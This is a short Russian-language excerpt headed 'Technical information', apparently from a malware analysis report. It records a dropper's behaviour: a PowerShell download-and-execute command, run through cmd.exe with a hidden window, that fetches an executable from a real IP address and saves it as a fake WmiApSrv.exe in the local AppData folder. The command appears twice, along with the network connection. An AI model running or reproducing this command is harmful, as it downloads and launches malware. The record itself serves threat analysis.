Техническая информация
- http://190.242.40.150/rewubsv9tt92to.exe как %localappdata%\wmiapsrv.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://190.242.40.150/rewUbsv9tT92TO.exe','%LOCALAPPDATA%\WmiApSrv.exe');Start-Process '%LOCALAPPDATA%\WmiApSrv.exe'
- '19#.#42.40.150':80
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://190.242.40.150/rewUbsv9tT92TO.exe','%LOCALAPPDATA%\WmiApSrv.exe');Start-Process '%LOCALAPPDATA%\WmiApSrv.exe'' (со скрытым окном)